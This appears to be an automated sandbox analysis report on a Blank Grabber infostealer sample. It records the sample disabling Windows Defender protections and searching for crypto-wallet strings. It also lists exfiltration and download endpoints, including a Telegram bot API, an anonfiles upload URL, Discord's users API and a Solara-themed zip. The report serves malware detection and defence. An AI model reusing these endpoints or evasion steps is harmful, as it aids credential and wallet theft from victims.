                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Yara matchFile source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7664, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Blank Grabber
                Source: Yara matchFile source: 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1393387910.000001C12B874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key, type: DROPPED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E81353DC bind,2_2_00007FF8E81353DC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E8136424 listen,2_2_00007FF8E8136424

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Windows Management Instrumentation                		1
                DLL Side-Loading                		11
                Process Injection                		31
                Disable or Modify Tools                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		61
                Virtualization/Sandbox Evasion                		LSASS Memory151
                Security Software Discovery                		Remote Desktop Protocol1
                Data from Local System                		2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Native API                		Logon Script (Windows)Logon Script (Windows)11
                Process Injection                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS61
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture3
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                Obfuscated Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                Software Packing                		Cached Domain Credentials11
                System Network Configuration Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem34
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543368 Sample: SecuriteInfo.com.Win32.Agen... Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 68 ip-api.com 2->68 70 www.nodejs.org 2->70 72 8 other IPs or domains 2->72 90 Found malware configuration 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Yara detected Blank Grabber 2->94 96 8 other signatures 2->96 11 SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe 23 2->11         started        signatures3 process4 file5 60 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->60 dropped 62 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->62 dropped 64 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 11->64 dropped 66 17 other files (none is malicious) 11->66 dropped 106 Modifies Windows Defender protection settings 11->106 108 Adds a directory exclusion to Windows Defender 11->108 110 Removes signatures from Windows Defender 11->110 15 SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe 1 11->15         started        signatures6 process7 dnsIp8 80 ip-api.com 208.95.112.1, 49769, 80 TUT-ASUS United States 15->80 82 Found many strings related to Crypto-Wallets (likely being stolen) 15->82 84 Modifies Windows Defender protection settings 15->84 86 Adds a directory exclusion to Windows Defender 15->86 88 Removes signatures from Windows Defender 15->88 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 3 other processes 15->26 signatures9 process10 signatures11 98 Uses ipconfig to lookup or modify the Windows network settings 19->98 100 Modifies Windows Defender protection settings 19->100 102 Adds a directory exclusion to Windows Defender 19->102 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        104 Removes signatures from Windows Defender 22->104 33 powershell.exe 23 22->33         started        35 conhost.exe 22->35         started        37 MpCmdRun.exe 22->37         started        39 powershell.exe 23 24->39         started        41 conhost.exe 24->41         started        43 bound.exe 26->43         started        46 5 other processes 26->46 process12 dnsIp13 112 Loading BitLocker PowerShell Module 33->112 48 WmiPrvSE.exe 33->48         started        74 edge-term4-fra2.roblox.com 128.116.123.4, 443, 49792 ROBLOX-PRODUCTIONUS United States 43->74 76 www.nodejs.org 104.20.23.46, 443, 49809 CLOUDFLARENETUS United States 43->76 78 2 other IPs or domains 43->78 50 cmd.exe 43->50         started        52 conhost.exe 43->52         started        54 WerFault.exe 43->54         started        signatures14 process15 process16 56 conhost.exe 50->56         started        58 ipconfig.exe 50->58         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe53%ReversingLabsWin64.Trojan.Generic
                SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_decimal.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\_ssl.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\libcrypto-3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\libffi-8.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\libssl-3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\python313.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\rar.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\select.pyd0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\sqlite3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pyd0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://tools.ietf.org/html/rfc2388#section-4.40%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                http://crl.mic0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://httpbin.org/0%URL Reputationsafe
                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%URL Reputationsafe
                http://tools.ietf.org/html/rfc6125#section-6.4.30%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                https://www.newtonsoft.com/jsonschema0%URL Reputationsafe
                http://ocsp.sectigo.com00%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%URL Reputationsafe
                http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://sectigo.com/CPS00%URL Reputationsafe
                http://ocsp.thawte.com00%URL Reputationsafe
                http://upx.sf.net0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                nodejs.org
                		104.20.23.46
                		truefalse
                  		unknown
                  getsolara.dev
                  		172.67.203.125
                  		truefalse
                    		unknown
                    edge-term4-fra2.roblox.com
                    		128.116.123.4
                    		truefalse
                      		unknown
                      www.nodejs.org
                      		104.20.23.46
                      		truefalse
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown
                          clientsettings.roblox.com
                          		unknown
                          		unknownfalse
                            		unknown
                            blank-8rmnx.in
                            		unknown
                            		unknownfalse
                              		unknown
                              198.187.3.20.in-addr.arpa
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://getsolara.dev/asset/discord.jsonfalse
                                  		unknown
                                  https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalse
                                    		unknown
                                    https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalse
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://github.com/Blank-c/BlankOBFSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1406140672.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404697501.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1404952130.000001DCB6036000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1405277736.000001DCB5CFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://github.com/urllib3/urllib3/issues/29200SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://api.telegram.org/botSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://github.com/Blank-c/Blank-GrabberiSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ncs.roblox.com/uploadbound.exe, 00000011.00000002.1605507236.00000254B6C19000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.nodejs.orgbound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipbound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawbound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-fileSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://tools.ietf.org/html/rfc2388#section-4.4SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://aka.ms/vs/17/release/vc_redist.x64.exeSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpfalse
                                                              		unknown
                                                              https://api.anonfiles.com/uploadSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://packaging.python.org/en/latest/specifications/entry-points/#file-formatSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://discord.com/api/v9/users/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://cacerts.digiSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://github.com/Blank-c/Blank-Grabberr#SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://peps.python.org/pep-0205/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1396701791.000001DCB55F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407872022.000001DCB5897000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408510057.000001DCB5894000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB588C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                            		unknown
                                                                            http://127.0.0.1:6463/rpc?v=1bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.1500577512.000001E35B281000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://edge-term4-fra2.roblox.combound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1398382471.000001DCB5623000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://discord.combound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                        		unknown
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://blank-8RmNx.inSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://github.com/python/cpython/issues/86361.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5D21000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5D99000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409474610.000001DCB5DAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408120431.000001DCB5E6F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://crl.micpowershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://httpbin.org/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://getsolara.devbound.exe, 00000011.00000002.1605507236.00000254B6B55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
